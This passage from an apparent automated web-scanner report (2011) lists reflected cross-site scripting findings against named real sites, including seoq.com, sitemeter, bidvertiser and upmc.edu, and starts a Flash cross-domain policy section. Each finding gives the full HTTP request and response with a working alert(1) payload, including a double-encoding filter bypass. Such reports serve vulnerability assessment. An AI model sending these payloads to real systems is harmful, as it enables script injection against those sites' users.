The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26638'%3b4294ddce47c was submitted in the REST URL parameter 5. This input was echoed as 26638';4294ddce47c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/284126638'%3b4294ddce47c/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/284126638';4294ddce47c/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.138. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 38226<img%20src%3da%20onerror%3dalert(1)>ac631b92e88 was submitted in the REST URL parameter 5. This input was echoed as 38226<img src=a onerror=alert(1)>ac631b92e88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/284138226<img%20src%3da%20onerror%3dalert(1)>ac631b92e88/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 284138226<img src=a onerror=alert(1)>ac631b92e88 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.139. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a354b"><img%20src%3da%20onerror%3dalert(1)>cfb2573f01d was submitted in the REST URL parameter 5. This input was echoed as a354b"><img src=a onerror=alert(1)>cfb2573f01d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841a354b"><img%20src%3da%20onerror%3dalert(1)>cfb2573f01d/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2841a354b"><img src=a onerror=alert(1)>cfb2573f01d/N" title="SEO Quotient for ">
...[SNIP]...

7.140. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ec04'%3b0a71d25a67d was submitted in the REST URL parameter 6. This input was echoed as 2ec04';0a71d25a67d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2841/N2ec04'%3b0a71d25a67d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2841/N2ec04';0a71d25a67d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.141. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8e883<img%20src%3da%20onerror%3dalert(1)>6de707698a9 was submitted in the REST URL parameter 6. This input was echoed as 8e883<img src=a onerror=alert(1)>6de707698a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841/N8e883<img%20src%3da%20onerror%3dalert(1)>6de707698a9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:37 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>6de707698a9" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2841/N8e883<img src=a onerror=alert(1)>6de707698a9ddd</a>
...[SNIP]...

7.142. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b4eb"><img%20src%3da%20onerror%3dalert(1)>111f2913bfc was submitted in the REST URL parameter 6. This input was echoed as 8b4eb"><img src=a onerror=alert(1)>111f2913bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841/N8b4eb"><img%20src%3da%20onerror%3dalert(1)>111f2913bfc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:32 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2841/N8b4eb"><img src=a onerror=alert(1)>111f2913bfc" title="SEO Quotient for ">
...[SNIP]...

7.143. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b60"style%3d"x%3aexpression(alert(1))"d66771aed6f was submitted in the REST URL parameter 2. This input was echoed as 38b60"style="x:expression(alert(1))"d66771aed6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /webstatshq/www.onlinemicrofiche.com38b60"style%3d"x%3aexpression(alert(1))"d66771aed6f HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:13:47 GMT
Server: Apache
Set-Cookie: PHPSESSID=um5u5c0a1mc9cgem5l60jo9i27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 34825

angInfo('Cat keywords')));

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<meta name="description" content="onlinemicrofiche.com38b60"style="x:expression(alert(1))"d66771aed6f on sites like " />
...[SNIP]...

7.144. http://bdv.bidvertiser.com/BidVertiser.dbm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bdv.bidvertiser.com
Path:   /BidVertiser.dbm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a2dd'-alert(1)-'3b6a11685b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /BidVertiser.dbm?pid=349166&bid=862453 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com
Referer: http://www.google.com/search?hl=en&q=6a2dd'-alert(1)-'3b6a11685b8

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:35:12 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:35:12 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 1523
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 1523


try
{
tref=1;
win_name='null';
report_error=0;
docref='';
try
{
if (window.top.location=='') aa=1;
docref=document.referrer;
}
catch(er)
{
report_error=1;
docref='none';
}
if (report_err
...[SNIP]...
_frame='ifr' + 'ame' + ' name="BidVertiser_Frame"' + ' src="http://bdv.bidvertiser.com/bidvertiser.dbm?pid=349166&bid=862453&RD=45&DIF=1' + '&bd_ref_v=' + escape('http://www.google.com/search?hl=en&q=6a2dd'-alert(1)-'3b6a11685b8') + '&tref=' + tref + '&win_name=' + win_name + '&docref=' + docref + '&jsrand=' + jsrand + '&js1loc=' + escape(window.location.href) + '"' + ' width=468 ' + ' height=60 ' + ' marginwidth="0" ' + ' m
...[SNIP]...

7.145. http://s28.sitemeter.com/js/counter.asp [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 152b9"%3balert(1)//74ef2e7ad98 was submitted in the IP cookie. This input was echoed as 152b9";alert(1)//74ef2e7ad98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/counter.asp?site=s28japanator HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243152b9"%3balert(1)//74ef2e7ad98

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:06:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:16:53 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243152b9";alert(1)//74ef2e7ad98";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

7.146. http://s28.sitemeter.com/js/counter.js [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6e88"%3balert(1)//e83db7807b was submitted in the IP cookie. This input was echoed as c6e88";alert(1)//e83db7807b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/counter.js?site=s28japanator HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243c6e88"%3balert(1)//e83db7807b

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:06:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7293
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:16:50 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243c6e88";alert(1)//e83db7807b";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

7.147. http://www.a-m-7.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-m-7.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c02da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed81d56a3b9c was submitted in the REST URL parameter 1. This input was echoed as c02da"><script>alert(1)</script>d81d56a3b9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoc02da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed81d56a3b9c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.a-m-7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 02 May 2011 00:28:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash02
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://www.amateurmatch.com/favicon.icoc02da"><script>alert(1)</script>d81d56a3b9c
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.icoc02da"><script>alert(1)</script>d81d56a3b9c">here</a>.</body
...[SNIP]...

7.148. http://www.a-m-7.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-m-7.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b831e"><script>alert(1)</script>99020df904c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?b831e"><script>alert(1)</script>99020df904c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.a-m-7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 02 May 2011 00:28:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash02
X-AspNet-Version: 2.0.50727
Content-Length: 206
Location: http://www.amateurmatch.com/favicon.ico?b831e"><script>alert(1)</script>99020df904c=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.ico?b831e"><script>alert(1)</script>99020df904c=1">here</a>.</b
...[SNIP]...

7.149. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aiu-online.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aacd"><script>alert(1)</script>585d6f184ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiu-online.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 00:08:54 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 263
Location: http://www.aiuonline.edu/favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.aiuonline.edu/favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1">http://www.aiuonline.edu/favicon.ico?
...[SNIP]...

7.150. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aiu-online.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 64030<script>alert(1)</script>ba29df295d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?64030<script>alert(1)</script>ba29df295d9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiu-online.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 00:08:54 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 259
Location: http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1">http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1</a>
...[SNIP]...

7.151. http://www.upmc.edu/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.upmc.edu
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6476a"><script>alert(1)</script>b938a207577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?6476a"><script>alert(1)</script>b938a207577=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upmc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:30:27 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6520
X-Powered-By: ASP.NET
Location: http://upmc.com/?6476a"><script>alert(1)</script>b938a207577=1
Content-Length: 248
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1><p>The document has moved <a href="http://upmc.com/?6476a"><script>alert(1)</script>b938a207577=1">
...[SNIP]...

8. Flash cross-domain policy  previous  next
There are 127 instances of this issue:


8.1. http://0.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 02 May 2011 02:47:03 GMT
Expires: Mon, 02 May 2011 02:52:03 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
